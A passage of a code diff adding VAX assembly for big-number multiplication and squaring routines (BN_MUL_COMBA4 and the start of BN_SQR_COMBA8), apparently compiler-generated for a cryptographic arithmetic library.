+	mull3	r0,r5,-848(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-852(fp)
+	mull2	r0,r4
+	addl3	-848(fp),-852(fp),r0
+	bicl3	#0,r0,-848(fp)
+	cmpl	-848(fp),-852(fp)
+	bgequ	noname.269
+	addl2	#65536,r4
+noname.269:
+	movzwl	-846(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-848(fp),r0
+	ashl	#16,r0,-852(fp)
+	addl2	-852(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-852(fp)
+	bgequ	noname.270
+	incl	r4
+noname.270:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.271
+	incl	r2
+noname.271:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.272
+	incl	r8
+noname.272:
+
+	bicl3	#-65536,28(r6),r3
+	movzwl	30(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,16(r7),r2
+	movzwl	18(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-856(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-860(fp)
+	mull2	r0,r4
+	addl3	-856(fp),-860(fp),r0
+	bicl3	#0,r0,-856(fp)
+	cmpl	-856(fp),-860(fp)
+	bgequ	noname.273
+	addl2	#65536,r4
+noname.273:
+	movzwl	-854(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-856(fp),r0
+	ashl	#16,r0,-860(fp)
+	addl2	-860(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-860(fp)
+	bgequ	noname.274
+	incl	r4
+noname.274:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.275
+	incl	r2
+noname.275:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.276
+	incl	r8
+noname.276:
+
+	movl	r10,44(r11)
+
+	clrl	r10
+
+	bicl3	#-65536,28(r6),r3
+	movzwl	30(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,20(r7),r2
+	movzwl	22(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-864(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-868(fp)
+	mull2	r0,r4
+	addl3	-864(fp),-868(fp),r0
+	bicl3	#0,r0,-864(fp)
+	cmpl	-864(fp),-868(fp)
+	bgequ	noname.277
+	addl2	#65536,r4
+noname.277:
+	movzwl	-862(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-864(fp),r0
+	ashl	#16,r0,-868(fp)
+	addl2	-868(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-868(fp)
+	bgequ	noname.278
+	incl	r4
+noname.278:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.279
+	incl	r2
+noname.279:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.280
+	incl	r10
+noname.280:
+
+	bicl3	#-65536,24(r6),r3
+	movzwl	26(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,24(r7),r2
+	movzwl	26(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-872(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-876(fp)
+	mull2	r0,r4
+	addl3	-872(fp),-876(fp),r0
+	bicl3	#0,r0,-872(fp)
+	cmpl	-872(fp),-876(fp)
+	bgequ	noname.281
+	addl2	#65536,r4
+noname.281:
+	movzwl	-870(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-872(fp),r0
+	ashl	#16,r0,-876(fp)
+	addl2	-876(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-876(fp)
+	bgequ	noname.282
+	incl	r4
+noname.282:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.283
+	incl	r2
+noname.283:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.284
+	incl	r10
+noname.284:
+
+	bicl3	#-65536,20(r6),r3
+	movzwl	22(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,28(r7),r2
+	movzwl	30(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-880(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-884(fp)
+	mull2	r0,r4
+	addl3	-880(fp),-884(fp),r0
+	bicl3	#0,r0,-880(fp)
+	cmpl	-880(fp),-884(fp)
+	bgequ	noname.285
+	addl2	#65536,r4
+noname.285:
+	movzwl	-878(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-880(fp),r0
+	ashl	#16,r0,-884(fp)
+	addl2	-884(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-884(fp)
+	bgequ	noname.286
+	incl	r4
+noname.286:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.287
+	incl	r2
+noname.287:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.288
+	incl	r10
+noname.288:
+
+	movl	r9,48(r11)
+
+	clrl	r9
+
+	bicl3	#-65536,24(r6),r3
+	movzwl	26(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,28(r7),r2
+	movzwl	30(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-888(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-892(fp)
+	mull2	r0,r4
+	addl3	-888(fp),-892(fp),r0
+	bicl3	#0,r0,-888(fp)
+	cmpl	-888(fp),-892(fp)
+	bgequ	noname.289
+	addl2	#65536,r4
+noname.289:
+	movzwl	-886(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-888(fp),r0
+	ashl	#16,r0,-892(fp)
+	addl2	-892(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-892(fp)
+	bgequ	noname.290
+	incl	r4
+noname.290:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.291
+	incl	r2
+noname.291:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.292
+	incl	r9
+noname.292:
+
+	movzwl	30(r6),r2
+	bicl3	#-65536,24(r7),r3
+	movzwl	26(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,28(r6),-904(fp)
+	bicl3	#-65536,r2,-908(fp)
+	mull3	r0,-904(fp),-896(fp)
+	mull2	r3,-904(fp)
+	mull3	r3,-908(fp),-900(fp)
+	mull2	r0,-908(fp)
+	addl3	-896(fp),-900(fp),r0
+	bicl3	#0,r0,-896(fp)
+	cmpl	-896(fp),-900(fp)
+	bgequ	noname.293
+	addl2	#65536,-908(fp)
+noname.293:
+	movzwl	-894(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-908(fp)
+	bicl3	#-65536,-896(fp),r0
+	ashl	#16,r0,-900(fp)
+	addl3	-900(fp),-904(fp),r0
+	bicl3	#0,r0,-904(fp)
+	cmpl	-904(fp),-900(fp)
+	bgequ	noname.294
+	incl	-908(fp)
+noname.294:
+	movl	-904(fp),r1
+	movl	-908(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.295
+	incl	r2
+noname.295:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.296
+	incl	r9
+noname.296:
+
+	movl	r8,52(r11)
+
+	clrl	r8
+
+	movzwl	30(r6),r2
+	bicl3	#-65536,28(r7),r3
+	movzwl	30(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,28(r6),-920(fp)
+	bicl3	#-65536,r2,-924(fp)
+	mull3	r0,-920(fp),-912(fp)
+	mull2	r3,-920(fp)
+	mull3	r3,-924(fp),-916(fp)
+	mull2	r0,-924(fp)
+	addl3	-912(fp),-916(fp),r0
+	bicl3	#0,r0,-912(fp)
+	cmpl	-912(fp),-916(fp)
+	bgequ	noname.297
+	addl2	#65536,-924(fp)
+noname.297:
+	movzwl	-910(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-924(fp)
+	bicl3	#-65536,-912(fp),r0
+	ashl	#16,r0,-916(fp)
+	addl3	-916(fp),-920(fp),r0
+	bicl3	#0,r0,-920(fp)
+	cmpl	-920(fp),-916(fp)
+	bgequ	noname.298
+	incl	-924(fp)
+noname.298:
+	movl	-920(fp),r1
+	movl	-924(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.299
+	incl	r2
+noname.299:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.300
+	incl	r8
+noname.300:
+
+	movl	r10,56(r11)
+
+	movl	r9,60(r11)
+
+	ret	
+
+
+
+;r=4 ;(AP)
+;a=8 ;(AP)
+;b=12 ;(AP)
+;n=16 ;(AP)	n	by value (input)
+
+	.psect	code,nowrt
+
+.entry	BN_MUL_COMBA4,^m<r2,r3,r4,r5,r6,r7,r8,r9,r10,r11>
+	movab	-156(sp),sp
+
+	clrq	r9
+
+	clrl	r8
+
+	movl	8(ap),r6
+	bicl3	#-65536,(r6),r3
+	movzwl	2(r6),r2
+	bicl2	#-65536,r2
+	movl	12(ap),r7
+	bicl3	#-65536,(r7),r1
+	movzwl	2(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r2,r4
+	mull3	r0,r5,-4(fp)
+	mull2	r1,r5
+	mull3	r1,r4,-8(fp)
+	mull2	r0,r4
+	addl3	-4(fp),-8(fp),r0
+	bicl3	#0,r0,-4(fp)
+	cmpl	-4(fp),-8(fp)
+	bgequ	noname.303
+	addl2	#65536,r4
+noname.303:
+	movzwl	-2(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-4(fp),r0
+	ashl	#16,r0,-8(fp)
+	addl2	-8(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-8(fp)
+	bgequ	noname.304
+	incl	r4
+noname.304:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.305
+	incl	r2
+noname.305:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.306
+	incl	r8
+noname.306:
+
+	movl	4(ap),r11
+	movl	r10,(r11)
+
+	clrl	r10
+
+	bicl3	#-65536,(r6),r3
+	movzwl	2(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,4(r7),r2
+	movzwl	6(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-12(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-16(fp)
+	mull2	r0,r4
+	addl3	-12(fp),-16(fp),r0
+	bicl3	#0,r0,-12(fp)
+	cmpl	-12(fp),-16(fp)
+	bgequ	noname.307
+	addl2	#65536,r4
+noname.307:
+	movzwl	-10(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-12(fp),r0
+	ashl	#16,r0,-16(fp)
+	addl2	-16(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-16(fp)
+	bgequ	noname.308
+	incl	r4
+noname.308:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.309
+	incl	r2
+noname.309:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.310
+	incl	r10
+noname.310:
+
+	bicl3	#-65536,4(r6),r3
+	movzwl	6(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,(r7),r2
+	movzwl	2(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-20(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-24(fp)
+	mull2	r0,r4
+	addl3	-20(fp),-24(fp),r0
+	bicl3	#0,r0,-20(fp)
+	cmpl	-20(fp),-24(fp)
+	bgequ	noname.311
+	addl2	#65536,r4
+noname.311:
+	movzwl	-18(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-20(fp),r0
+	ashl	#16,r0,-24(fp)
+	addl2	-24(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-24(fp)
+	bgequ	noname.312
+	incl	r4
+noname.312:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.313
+	incl	r2
+noname.313:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.314
+	incl	r10
+noname.314:
+
+	movl	r9,4(r11)
+
+	clrl	r9
+
+	bicl3	#-65536,8(r6),r3
+	movzwl	10(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,(r7),r2
+	movzwl	2(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-28(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-32(fp)
+	mull2	r0,r4
+	addl3	-28(fp),-32(fp),r0
+	bicl3	#0,r0,-28(fp)
+	cmpl	-28(fp),-32(fp)
+	bgequ	noname.315
+	addl2	#65536,r4
+noname.315:
+	movzwl	-26(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-28(fp),r0
+	ashl	#16,r0,-32(fp)
+	addl2	-32(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-32(fp)
+	bgequ	noname.316
+	incl	r4
+noname.316:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.317
+	incl	r2
+noname.317:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.318
+	incl	r9
+noname.318:
+
+	bicl3	#-65536,4(r6),r3
+	movzwl	6(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,4(r7),r2
+	movzwl	6(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-36(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-40(fp)
+	mull2	r0,r4
+	addl3	-36(fp),-40(fp),r0
+	bicl3	#0,r0,-36(fp)
+	cmpl	-36(fp),-40(fp)
+	bgequ	noname.319
+	addl2	#65536,r4
+noname.319:
+	movzwl	-34(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-36(fp),r0
+	ashl	#16,r0,-40(fp)
+	addl2	-40(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-40(fp)
+	bgequ	noname.320
+	incl	r4
+noname.320:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.321
+	incl	r2
+noname.321:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.322
+	incl	r9
+noname.322:
+
+	bicl3	#-65536,(r6),r3
+	movzwl	2(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,8(r7),r2
+	movzwl	10(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-44(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-48(fp)
+	mull2	r0,r4
+	addl3	-44(fp),-48(fp),r0
+	bicl3	#0,r0,-44(fp)
+	cmpl	-44(fp),-48(fp)
+	bgequ	noname.323
+	addl2	#65536,r4
+noname.323:
+	movzwl	-42(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-44(fp),r0
+	ashl	#16,r0,-48(fp)
+	addl2	-48(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-48(fp)
+	bgequ	noname.324
+	incl	r4
+noname.324:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.325
+	incl	r2
+noname.325:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.326
+	incl	r9
+noname.326:
+
+	movl	r8,8(r11)
+
+	clrl	r8
+
+	bicl3	#-65536,(r6),r3
+	movzwl	2(r6),r2
+	bicl3	#-65536,12(r7),r1
+	movzwl	14(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r4
+	bicl3	#-65536,r2,-60(fp)
+	mull3	r0,r4,-52(fp)
+	mull2	r1,r4
+	mull3	r1,-60(fp),-56(fp)
+	mull2	r0,-60(fp)
+	addl3	-52(fp),-56(fp),r0
+	bicl3	#0,r0,-52(fp)
+	cmpl	-52(fp),-56(fp)
+	bgequ	noname.327
+	addl2	#65536,-60(fp)
+noname.327:
+	movzwl	-50(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-60(fp)
+	bicl3	#-65536,-52(fp),r0
+	ashl	#16,r0,-56(fp)
+	addl2	-56(fp),r4
+	bicl2	#0,r4
+	cmpl	r4,-56(fp)
+	bgequ	noname.328
+	incl	-60(fp)
+noname.328:
+	movl	r4,r1
+	movl	-60(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.329
+	incl	r2
+noname.329:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.330
+	incl	r8
+noname.330:
+
+	movzwl	6(r6),r2
+	bicl3	#-65536,8(r7),r3
+	movzwl	10(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,4(r6),-72(fp)
+	bicl3	#-65536,r2,-76(fp)
+	mull3	r0,-72(fp),-64(fp)
+	mull2	r3,-72(fp)
+	mull3	r3,-76(fp),-68(fp)
+	mull2	r0,-76(fp)
+	addl3	-64(fp),-68(fp),r0
+	bicl3	#0,r0,-64(fp)
+	cmpl	-64(fp),-68(fp)
+	bgequ	noname.331
+	addl2	#65536,-76(fp)
+noname.331:
+	movzwl	-62(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-76(fp)
+	bicl3	#-65536,-64(fp),r0
+	ashl	#16,r0,-68(fp)
+	addl3	-68(fp),-72(fp),r0
+	bicl3	#0,r0,-72(fp)
+	cmpl	-72(fp),-68(fp)
+	bgequ	noname.332
+	incl	-76(fp)
+noname.332:
+	movl	-72(fp),r1
+	movl	-76(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.333
+	incl	r2
+noname.333:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.334
+	incl	r8
+noname.334:
+
+	bicl3	#-65536,8(r6),r3
+	movzwl	10(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,4(r7),r2
+	movzwl	6(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-80(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-84(fp)
+	mull2	r0,r4
+	addl3	-80(fp),-84(fp),r0
+	bicl3	#0,r0,-80(fp)
+	cmpl	-80(fp),-84(fp)
+	bgequ	noname.335
+	addl2	#65536,r4
+noname.335:
+	movzwl	-78(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-80(fp),r0
+	ashl	#16,r0,-84(fp)
+	addl2	-84(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-84(fp)
+	bgequ	noname.336
+	incl	r4
+noname.336:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.337
+	incl	r2
+noname.337:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.338
+	incl	r8
+noname.338:
+
+	bicl3	#-65536,12(r6),r3
+	movzwl	14(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,(r7),r2
+	movzwl	2(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-88(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-92(fp)
+	mull2	r0,r4
+	addl3	-88(fp),-92(fp),r0
+	bicl3	#0,r0,-88(fp)
+	cmpl	-88(fp),-92(fp)
+	bgequ	noname.339
+	addl2	#65536,r4
+noname.339:
+	movzwl	-86(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-88(fp),r0
+	ashl	#16,r0,-92(fp)
+	addl2	-92(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-92(fp)
+	bgequ	noname.340
+	incl	r4
+noname.340:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.341
+	incl	r2
+noname.341:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.342
+	incl	r8
+noname.342:
+
+	movl	r10,12(r11)
+
+	clrl	r10
+
+	bicl3	#-65536,12(r6),r3
+	movzwl	14(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,4(r7),r2
+	movzwl	6(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-96(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-100(fp)
+	mull2	r0,r4
+	addl3	-96(fp),-100(fp),r0
+	bicl3	#0,r0,-96(fp)
+	cmpl	-96(fp),-100(fp)
+	bgequ	noname.343
+	addl2	#65536,r4
+noname.343:
+	movzwl	-94(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-96(fp),r0
+	ashl	#16,r0,-100(fp)
+	addl2	-100(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-100(fp)
+	bgequ	noname.344
+	incl	r4
+noname.344:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.345
+	incl	r2
+noname.345:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.346
+	incl	r10
+noname.346:
+
+	bicl3	#-65536,8(r6),r3
+	movzwl	10(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,8(r7),r2
+	movzwl	10(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-104(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-108(fp)
+	mull2	r0,r4
+	addl3	-104(fp),-108(fp),r0
+	bicl3	#0,r0,-104(fp)
+	cmpl	-104(fp),-108(fp)
+	bgequ	noname.347
+	addl2	#65536,r4
+noname.347:
+	movzwl	-102(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-104(fp),r0
+	ashl	#16,r0,-108(fp)
+	addl2	-108(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-108(fp)
+	bgequ	noname.348
+	incl	r4
+noname.348:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.349
+	incl	r2
+noname.349:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.350
+	incl	r10
+noname.350:
+
+	bicl3	#-65536,4(r6),r3
+	movzwl	6(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,12(r7),r2
+	movzwl	14(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-112(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-116(fp)
+	mull2	r0,r4
+	addl3	-112(fp),-116(fp),r0
+	bicl3	#0,r0,-112(fp)
+	cmpl	-112(fp),-116(fp)
+	bgequ	noname.351
+	addl2	#65536,r4
+noname.351:
+	movzwl	-110(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-112(fp),r0
+	ashl	#16,r0,-116(fp)
+	addl2	-116(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-116(fp)
+	bgequ	noname.352
+	incl	r4
+noname.352:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.353
+	incl	r2
+noname.353:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.354
+	incl	r10
+noname.354:
+
+	movl	r9,16(r11)
+
+	clrl	r9
+
+	bicl3	#-65536,8(r6),r3
+	movzwl	10(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,12(r7),r2
+	movzwl	14(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-120(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-124(fp)
+	mull2	r0,r4
+	addl3	-120(fp),-124(fp),r0
+	bicl3	#0,r0,-120(fp)
+	cmpl	-120(fp),-124(fp)
+	bgequ	noname.355
+	addl2	#65536,r4
+noname.355:
+	movzwl	-118(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-120(fp),r0
+	ashl	#16,r0,-124(fp)
+	addl2	-124(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-124(fp)
+	bgequ	noname.356
+	incl	r4
+noname.356:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.357
+	incl	r2
+noname.357:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.358
+	incl	r9
+noname.358:
+
+	movzwl	14(r6),r2
+	bicl3	#-65536,8(r7),r3
+	movzwl	10(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,12(r6),-136(fp)
+	bicl3	#-65536,r2,-140(fp)
+	mull3	r0,-136(fp),-128(fp)
+	mull2	r3,-136(fp)
+	mull3	r3,-140(fp),-132(fp)
+	mull2	r0,-140(fp)
+	addl3	-128(fp),-132(fp),r0
+	bicl3	#0,r0,-128(fp)
+	cmpl	-128(fp),-132(fp)
+	bgequ	noname.359
+	addl2	#65536,-140(fp)
+noname.359:
+	movzwl	-126(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-140(fp)
+	bicl3	#-65536,-128(fp),r0
+	ashl	#16,r0,-132(fp)
+	addl3	-132(fp),-136(fp),r0
+	bicl3	#0,r0,-136(fp)
+	cmpl	-136(fp),-132(fp)
+	bgequ	noname.360
+	incl	-140(fp)
+noname.360:
+	movl	-136(fp),r1
+	movl	-140(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.361
+	incl	r2
+noname.361:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.362
+	incl	r9
+noname.362:
+
+	movl	r8,20(r11)
+
+	clrl	r8
+
+	movzwl	14(r6),r2
+	bicl3	#-65536,12(r7),r3
+	movzwl	14(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,12(r6),-152(fp)
+	bicl3	#-65536,r2,-156(fp)
+	mull3	r0,-152(fp),-144(fp)
+	mull2	r3,-152(fp)
+	mull3	r3,-156(fp),-148(fp)
+	mull2	r0,-156(fp)
+	addl3	-144(fp),-148(fp),r0
+	bicl3	#0,r0,-144(fp)
+	cmpl	-144(fp),-148(fp)
+	bgequ	noname.363
+	addl2	#65536,-156(fp)
+noname.363:
+	movzwl	-142(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-156(fp)
+	bicl3	#-65536,-144(fp),r0
+	ashl	#16,r0,-148(fp)
+	addl3	-148(fp),-152(fp),r0
+	bicl3	#0,r0,-152(fp)
+	cmpl	-152(fp),-148(fp)
+	bgequ	noname.364
+	incl	-156(fp)
+noname.364:
+	movl	-152(fp),r1
+	movl	-156(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.365
+	incl	r2
+noname.365:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.366
+	incl	r8
+noname.366:
+
+	movl	r10,24(r11)
+
+	movl	r9,28(r11)
+
+	ret	
+
+
+
+;r=4 ;(AP)
+;a=8 ;(AP)
+;b=12 ;(AP)
+;n=16 ;(AP)	n	by value (input)
+
+	.psect	code,nowrt
+
+.entry	BN_SQR_COMBA8,^m<r2,r3,r4,r5,r6,r7,r8,r9>
+	movab	-444(sp),sp
+
+	clrq	r8
+
+	clrl	r7
+
+	movl	8(ap),r4
+	movl	(r4),r3
+	bicl3	#-65536,r3,-4(fp)
+	extzv	#16,#16,r3,r0
+	bicl3	#-65536,r0,r3
+	movl	-4(fp),r0
+	mull3	r0,r3,-8(fp)
+	mull3	r0,r0,-4(fp)
+	mull2	r3,r3
